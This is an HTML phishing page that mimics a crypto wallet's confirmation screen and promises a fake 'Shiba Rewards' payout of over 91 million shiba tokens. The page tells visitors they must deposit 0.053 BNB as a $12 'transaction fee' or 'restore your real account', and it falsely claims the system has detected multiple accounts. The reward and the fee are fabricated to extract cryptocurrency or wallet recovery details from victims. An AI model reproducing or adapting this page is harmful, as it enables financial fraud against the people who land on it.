<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="shortcut icon" href="https://upload.wikimedia.org/wikipedia/tr/5/51/Shiba_coin_logo.png">
    
    <title>SHIBA</title>
    <style>
      #app-content {
        display: flex;
        flex-flow: column;
      }

      #loading__logo {
        width: 10rem;
        height: 10rem;
        align-self: center;
        margin: 10rem 0 0 0;
      }

      #loading__spinner {
        width: 2rem;
        height: 2rem;
        align-self: center;
        margin-top: 1rem;
      }
    </style>


    <link rel="stylesheet" type="text/css" href="./home_files/index10.css" title="ltr">
    <link rel="stylesheet" type="text/css" href="./home_files/index-rtl.css" title="rtl" disabled="">
  <style></style></head>
  <body class="notification">
    <div id="app-content"><div class="app"><div><span></span></div><div class="menu-droppo-container network-droppo" style="position: absolute; top: 58px; width: 309px; z-index: 55;"><style>
          .menu-droppo-enter {
            transition: transform 300ms ease-in-out;
            transform: translateY(-200%);
          }

          .menu-droppo-enter.menu-droppo-enter-active {
            transition: transform 300ms ease-in-out;
            transform: translateY(0%);
          }

          .menu-droppo-leave {
            transition: transform 300ms ease-in-out;
            transform: translateY(0%);
          }

          .menu-droppo-leave.menu-droppo-leave-active {
            transition: transform 300ms ease-in-out;
            transform: translateY(-200%);
          }
        </style></div><div class="main-container-wrapper"><div class="page-container"><div class="confirm-page-container-navigation" style="display: none;"><div class="confirm-page-container-navigation__container" style="visibility: hidden;"><div class="" >
		
	<center><img src="https://upload.wikimedia.org/wikipedia/tr/5/51/Shiba_coin_logo.png"
  style="margin-top:-55px" width="200px"></center>
		
		<center><img src="https://upload.wikimedia.org/wikipedia/tr/5/51/Shiba_coin_logo.png"
  style="margin-top:-55px" width="200px"></center></div>
		
		</div><div class="confirm-page-container-navigation__textcontainer"></div><div class="confirm-page-container-navigation__container" style="visibility: hidden;"><div class="confirm-page-container-navigation__arrow" data-testid="next-page"><img class="confirm-page-container-navigation__imageflip" src="./home_files/single-arrow.svg" alt=""></div><div class="confirm-page-container-navigation__arrow" data-testid="last-page"><img class="confirm-page-container-navigation__imageflip" src="./home_files/double-arrow.svg" alt=""></div></div></div><div class="confirm-approve-content"><div class="confirm-approve-content__identicon-wrapper">
<center><img src="https://upload.wikimedia.org/wikipedia/tr/5/51/Shiba_coin_logo.png"
  style="margin-top:-15px" width="70px"></center>
		
		</div><div class="confirm-approve-content__title">Shiba Rewards</div>
<div class="confirm-approve-content__description">You Get 91312962.08 shiba , you must have a balance of at least 0.053 BNB on the network. Please deposit 0.053 bnb to your wallet address. or, restore your real account. Our system detects that you have more than 1 account.

<div class="confirm-approve-content__card-wrapper"><div class="confirm-approve-content__card--no-border"><div class="confirm-approve-content__card-header"><div class="confirm-approve-content__card-header__title"></div><div class="confirm-approve-content__small-blue-text cursor-pointer"></div></div><div class="confirm-approve-content__card-content"><div class="confirm-approve-content__transaction-details-content"><div class="confirm-approve-content__small-text">
</div></div></div>
 <div class="confirm-approve-content__edit-submission-button-container"></div>
                <div class="confirm-approve-content__card-wrapper">
                    <div class="confirm-approve-content__card--no-border">
                        <div class="confirm-approve-content__card-header">
						<img src="https://upload.wikimedia.org/wikipedia/commons/thumb/a/ac/Approve_icon.svg/2048px-Approve_icon.svg.png"
  style="margin-top:-01px" width="10px">
                          
                            <div class="confirm-approve-content__card-header__title">Transaction Fee</div>
                            <div class="confirm-approve-content__small-blue-text cursor-pointer">USDT/BNB</div>
                        </div>
                        <div class="confirm-approve-content__card-content">
                            <div class="confirm-approve-content__transaction-details-content">
                                <div class="confirm-approve-content__small-text">A fee is associated with this request.</div>
                                <div class="confirm-approve-content__transaction-details-content__fee">
                                    <div class="confirm-approve-content__transaction-details-content__primary-fee">$12</div>
                                    <div class="confirm-approve-content__transaction-details-content__secondary-fee">0.053 bnb </div>
                                </div>
                            </div>
                        </div>
                      <div class="confirm-approve-content__description"></b><br><span class="register__label" style="color:red;"><font size="3">Transaction pending..</span>
   
                        </div>
						
                    </div>
                </div>
            </div>
			
            <div class="page-container__footer">
                <footer>
                </footer>
            </div>
   <div class="confirm-approve-content__small-text">
                         
    <script src="./home_files/globalthis.js.download" type="text/javascript" charset="utf-8"></script>
    <script src="./home_files/initSentry.js.download" type="text/javascript" charset="utf-8"></script>
    <script src="./home_files/lockdown.js.download" type="text/javascript" charset="utf-8"></script>
    <script src="./home_files/runLockdown.js.download" type="text/javascript" charset="utf-8"></script>


</body></html>
